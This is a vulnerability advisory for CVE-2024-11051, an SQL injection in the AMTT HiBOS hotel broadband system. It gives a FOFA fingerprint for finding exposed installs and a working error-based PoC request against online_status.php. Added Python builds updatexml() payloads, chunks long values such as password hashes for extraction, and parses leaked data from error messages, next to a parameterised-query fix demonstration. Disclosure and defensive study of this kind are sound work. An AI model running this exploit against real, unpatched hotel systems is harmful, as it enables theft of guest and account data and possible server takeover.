[Original] (CVE-2024-11051) AMTT (安美微客(上海)互联网科技有限公司) HiBOS Hotel Broadband Operation System (HiBOS) <= V3.0.3.151204 SQL Injection Vulnerability




Time                 Author  Visibility  Severity  Rank
2024-10-22 23:57:09  Xe      Public      High      3

CVE-2024-11051
Created: 11/09/2024 05:01 PM
Updated: 11/10/2024 10:08 AM
Changes: 11/09/2024 05:01 PM (57), 11/10/2024 10:08 AM (30)
Submitter: Xe@wiki


Vulnerability Description

- Summary

AMTT Hotel Broadband Operation System (HiBOS) is a network management solution designed for hotels. It provides guest internet access and supports user login management, bandwidth allocation, network monitoring and data analysis. Through its customizable interface the system is intended to optimize network performance for guests while letting hotel staff monitor and maintain the network environment.

HiBOS version 3.0.3.151204 and earlier is vulnerable to SQL injection. The AccountID parameter of /manager/frontdesk/online_status.php is placed into a SQL query without sanitization or parameter binding, so a single quote in the value closes the intended string literal and the rest of the value is executed as SQL. The PoC below uses MySQL's updatexml() error-based technique: the injected sub-query (here select @@version) is evaluated inside updatexml(), and because the result is not valid XPath the database reports it back in an "XPATH syntax error" message. Extracting data this way requires the application to echo database errors to the client; if errors are suppressed the injection is still present but data would have to be extracted with blind (boolean- or time-based) techniques instead. An attacker who exploits this can read sensitive data from the backend database, modify database contents and execute administrative operations on the database; depending on the privileges of the database account and the server configuration, this can in some cases lead to control of the server.

Asset Mapping (FOFA query)

icon_hash="1259797304"

POC

GET /manager/frontdesk/online_status.php?AccountID=1%27or%20updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)%20or%20%27 HTTP/1.1
Host: 

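The following is an added example, not HiBOS code or anything from the original advisory. It reconstructs the PoC request line above, shows on an in-memory SQLite table why a concatenated AccountID reaches the engine as SQL while a parameterised query treats it as data, and parses the MySQL XPATH error that updatexml() abuses to leak a value. The table schema, the helper names and the sample response body are assumptions constructed for the demonstration; the endpoint, parameter name and payload come from the PoC.

```python
# Added example (not HiBOS code). Reconstructs the PoC request, demonstrates the
# root cause on SQLite, and parses the updatexml() error used for extraction.
import re
import sqlite3
from typing import List, Optional
from urllib.parse import quote

ENDPOINT = "/manager/frontdesk/online_status.php"   # from the PoC
PARAM = "AccountID"                                 # injection point from the PoC


def updatexml_payload(expr: str) -> str:
    """Wrap a MySQL expression in the error-based probe used by the PoC.

    0x7e ('~') on both sides makes the value easy to find in the error text;
    the trailing "or '" re-balances the quote opened by the original query.
    """
    return f"1'or updatexml(1,concat(0x7e,({expr}),0x7e),1) or '"


def poc_request_line(expr: str = "select @@version") -> str:
    """Request line of the PoC GET; safe='(),@' reproduces the page's encoding."""
    return f"GET {ENDPOINT}?{PARAM}={quote(updatexml_payload(expr), safe='(),@')} HTTP/1.1"


def chunked_exprs(expr: str, total_len: int, width: int = 30) -> List[str]:
    """updatexml() shows at most 32 characters of the bad XPath, two of which are
    the '~' delimiters, so longer values are read 30 characters at a time."""
    return [f"substr(({expr}),{start},{width})" for start in range(1, total_len + 1, width)]


XPATH_ERROR = re.compile(r"XPATH syntax error: '~(.*?)~'")


def extract_from_error(body: str) -> Optional[str]:
    """Recover the leaked value from a MySQL error echoed in the HTTP response."""
    m = XPATH_ERROR.search(body)
    return m.group(1) if m else None


# Constructed response body, modelled on how PHP echoes a mysqli error (assumption).
SAMPLE_BODY = ("<b>Warning</b>: mysqli_query(): (HY000/1105): "
               "XPATH syntax error: '~5.7.26-log~' in /var/www/x.php on line 12")


def _db() -> sqlite3.Connection:
    """In-memory table standing in for the online-status table (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE online (AccountID TEXT, ip TEXT)")
    con.executemany("INSERT INTO online VALUES (?, ?)",
                    [("1", "10.0.0.5"), ("2", "10.0.0.9")])
    return con


def vulnerable_lookup(account_id: str) -> list:
    """String concatenation: the quote in the payload ends the literal and the
    rest of the value is parsed as SQL (on MySQL updatexml() then leaks data)."""
    sql = f"SELECT AccountID, ip FROM online WHERE AccountID='{account_id}'"
    return _db().execute(sql).fetchall()


def injection_reaches_engine(account_id: str) -> bool:
    """True when SQLite rejects the concatenated query, i.e. the input was
    parsed as SQL (unknown updatexml()/@@ syntax) rather than compared as data."""
    try:
        vulnerable_lookup(account_id)
        return False
    except sqlite3.OperationalError:
        return True


def safe_lookup(account_id: str) -> list:
    """Parameterised query: the whole payload is compared as one literal string."""
    sql = "SELECT AccountID, ip FROM online WHERE AccountID=?"
    return _db().execute(sql, (account_id,)).fetchall()


if __name__ == "__main__":
    payload = updatexml_payload("select @@version")
    print(poc_request_line())
    print("leaked from sample body:", extract_from_error(SAMPLE_BODY))
    print("payload parsed as SQL by vulnerable query:", injection_reaches_engine(payload))
    print("rows from parameterised query:", safe_lookup(payload))
```

The 30-character chunking matters in practice: a long value such as a password hash must be pulled out with successive substr() calls, each sent as its own request and each parsed from its own error message. The parameterised form is the fix the vendor would need to apply to online_status.php (or its PHP equivalent with prepared statements); input filtering alone is not a substitute.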

Patch

None available at the time of writing.

